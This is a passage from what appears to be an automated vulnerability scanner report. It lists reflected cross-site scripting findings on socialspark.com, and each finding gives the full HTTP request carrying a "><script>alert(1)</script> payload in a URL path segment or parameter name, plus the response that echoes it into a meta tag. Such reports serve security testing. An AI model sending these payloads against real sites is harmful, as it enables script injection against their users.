Last-Modified: Sun, 20 Mar 2011 13:47:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes3464e\"><script>alert(1)</script>de8a601c5a5/izea/img/500.jpg"/>
...[SNIP]...

1.168. http://socialspark.com/wp-content/themes/izea/img/500.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/img/500.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8753"><script>alert(1)</script>31f2b258991 was submitted in the REST URL parameter 3. This input was echoed as b8753\"><script>alert(1)</script>31f2b258991 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/izeab8753"><script>alert(1)</script>31f2b258991/img/500.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes/izeab8753\"><script>alert(1)</script>31f2b258991/img/500.jpg"/>
...[SNIP]...

1.169. http://socialspark.com/wp-content/themes/izea/img/500.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/img/500.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc733"><script>alert(1)</script>7bca89c5536 was submitted in the REST URL parameter 4. This input was echoed as dc733\"><script>alert(1)</script>7bca89c5536 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/izea/imgdc733"><script>alert(1)</script>7bca89c5536/500.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes/izea/imgdc733\"><script>alert(1)</script>7bca89c5536/500.jpg"/>
...[SNIP]...

1.170. http://socialspark.com/wp-content/themes/izea/img/500.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/img/500.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73d16"><script>alert(1)</script>fe6812f71da was submitted in the REST URL parameter 5. This input was echoed as 73d16\"><script>alert(1)</script>fe6812f71da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/izea/img/500.jpg73d16"><script>alert(1)</script>fe6812f71da HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes/izea/img/500.jpg73d16\"><script>alert(1)</script>fe6812f71da"/>
...[SNIP]...

1.171. http://socialspark.com/wp-content/themes/izea/img/500.jpg [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/img/500.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc91e"><script>alert(1)</script>bf5ffbf5bc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc91e\"><script>alert(1)</script>bf5ffbf5bc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/izea/img/500.jpg?bc91e"><script>alert(1)</script>bf5ffbf5bc6=1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:46:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:46:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes/izea/img/500.jpg?bc91e\"><script>alert(1)</script>bf5ffbf5bc6=1"/>
...[SNIP]...

1.172. http://socialspark.com/wp-content/themes/izea/swf/uni_sans_semi_bold.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/swf/uni_sans_semi_bold.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70234"><script>alert(1)</script>c7f799821d7 was submitted in the REST URL parameter 1. This input was echoed as 70234\"><script>alert(1)</script>c7f799821d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content70234"><script>alert(1)</script>c7f799821d7/themes/izea/swf/uni_sans_semi_bold.swf HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content70234\"><script>alert(1)</script>c7f799821d7/themes/izea/swf/uni_sans_semi_bold.swf"/>
...[SNIP]...

1.173. http://socialspark.com/wp-content/themes/izea/swf/uni_sans_semi_bold.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/swf/uni_sans_semi_bold.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b9be"><script>alert(1)</script>7072b935964 was submitted in the REST URL parameter 2. This input was echoed as 2b9be\"><script>alert(1)</script>7072b935964 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes2b9be"><script>alert(1)</script>7072b935964/izea/swf/uni_sans_semi_bold.swf HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes2b9be\"><script>alert(1)</script>7072b935964/izea/swf/uni_sans_semi_bold.swf"/>
...[SNIP]...

1.174. http://socialspark.com/wp-content/themes/izea/swf/uni_sans_semi_bold.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/swf/uni_sans_semi_bold.swf

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22a11"><script>alert(1)</script>1a5b128daaa was submitted in the REST URL parameter 3. This input was echoed as 22a11\"><script>alert(1)</script>1a5b128daaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/izea22a11"><script>alert(1)</script>1a5b128daaa/swf/uni_sans_semi_bold.swf HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes/izea22a11\"><script>alert(1)</script>1a5b128daaa/swf/uni_sans_semi_bold.swf"/>
...[SNIP]...

1.175. http://socialspark.com/wp-content/themes/izea/swf/uni_sans_semi_bold.swf [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/swf/uni_sans_semi_bold.swf

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3675"><script>alert(1)</script>c6580ca81af was submitted in the REST URL parameter 4. This input was echoed as b3675\"><script>alert(1)</script>c6580ca81af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/izea/swfb3675"><script>alert(1)</script>c6580ca81af/uni_sans_semi_bold.swf HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes/izea/swfb3675\"><script>alert(1)</script>c6580ca81af/uni_sans_semi_bold.swf"/>
...[SNIP]...

1.176. http://socialspark.com/wp-content/themes/izea/swf/uni_sans_semi_bold.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/swf/uni_sans_semi_bold.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7922"><script>alert(1)</script>3053d01ecb1 was submitted in the REST URL parameter 5. This input was echoed as b7922\"><script>alert(1)</script>3053d01ecb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/izea/swf/uni_sans_semi_bold.swfb7922"><script>alert(1)</script>3053d01ecb1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes/izea/swf/uni_sans_semi_bold.swfb7922\"><script>alert(1)</script>3053d01ecb1"/>
...[SNIP]...

1.177. http://socialspark.com/wp-content/themes/izea/swf/uni_sans_semi_bold.swf [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/izea/swf/uni_sans_semi_bold.swf

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 670f0"><script>alert(1)</script>060ce36eb0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 670f0\"><script>alert(1)</script>060ce36eb0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/izea/swf/uni_sans_semi_bold.swf?670f0"><script>alert(1)</script>060ce36eb0a=1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:46:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:46:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes/izea/swf/uni_sans_semi_bold.swf?670f0\"><script>alert(1)</script>060ce36eb0a=1"/>
...[SNIP]...

1.178. http://socialspark.com/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aafa"><script>alert(1)</script>edd7197c87c was submitted in the REST URL parameter 1. This input was echoed as 9aafa\"><script>alert(1)</script>edd7197c87c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9aafa"><script>alert(1)</script>edd7197c87c/themes/socialspark/swf/uni_sans_semi_bold.swf HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.1.10.1300628473; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content9aafa\"><script>alert(1)</script>edd7197c87c/themes/socialspark/swf/uni_sans_semi_bold.swf"/>
...[SNIP]...

1.179. http://socialspark.com/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ce1a"><script>alert(1)</script>acc6b4de7dc was submitted in the REST URL parameter 2. This input was echoed as 4ce1a\"><script>alert(1)</script>acc6b4de7dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes4ce1a"><script>alert(1)</script>acc6b4de7dc/socialspark/swf/uni_sans_semi_bold.swf HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.1.10.1300628473; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes4ce1a\"><script>alert(1)</script>acc6b4de7dc/socialspark/swf/uni_sans_semi_bold.swf"/>
...[SNIP]...

1.180. http://socialspark.com/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swf

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a66e1"><script>alert(1)</script>e3336a71290 was submitted in the REST URL parameter 3. This input was echoed as a66e1\"><script>alert(1)</script>e3336a71290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/socialsparka66e1"><script>alert(1)</script>e3336a71290/swf/uni_sans_semi_bold.swf HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.1.10.1300628473; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
